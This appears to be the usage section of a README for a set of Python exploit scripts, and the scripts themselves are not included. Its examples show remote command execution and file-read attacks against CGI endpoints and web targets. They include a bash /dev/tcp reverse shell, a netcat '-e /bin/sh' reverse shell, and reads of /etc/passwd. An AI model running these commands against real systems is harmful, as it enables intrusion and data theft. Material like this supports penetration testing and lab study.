FOR EDUCATIONAL PURPOSE ONLY
Written in python3, these scripts would probably have been cleaner. Feel free to hack and improve them to your liking.
Usage:
python3 exploit.py <TARGET_IP> (<TARGET_PORT>)
Examples:
python3 exploit.py 10.10.10.10
python3 exploit.py 10.10.10.10 21
Usage:
python3 exploit.py <TARGET_URL> <COMMAND>
Examples:
python3 exploit.py http://10.10.60.20/cgi-bin/test.cgi (Default "cat /etc/passwd")
python3 exploit.py https://www.target.com/cgi-bin/file.cgi "cat /etc/passwd"
python3 exploit.py http://10.10.60.20/cgi-bin/test.cgi "bash -i >& /dev/tcp/10.10.10.10/1337 0>&1"
Usage:
python3 exploit.py <TARGET_IP> <COMMAND>
Examples:
python3 exploit.py 10.10.10.10 "id"
python3 exploit.py 172.17.0.1 "cat /etc/passwd"
Usage:
python3 exploit.py <TARGET_URL> <FILE>
Examples:
python3 exploit.py https://www.target.com /etc/passwd
python3 exploit.py http://10.10.10.10 "/etc/passwd"
Usage:
python3 exploit.py <TARGET_URL> <USERNAME> <PASSWORD> <COMMAND>
Examples:
python3 exploit.py https://www.target.com "admin" 'P@ssw0rd123!' id
python3 exploit.py http://10.10.10.10 admin password "nc 10.10.10.255 1337 -e /bin/sh"
Usage:
python3 exploit.py <TARGET_URL>
Examples:
python3 exploit.py https://www.target.com
python3 exploit.py http://10.10.10.10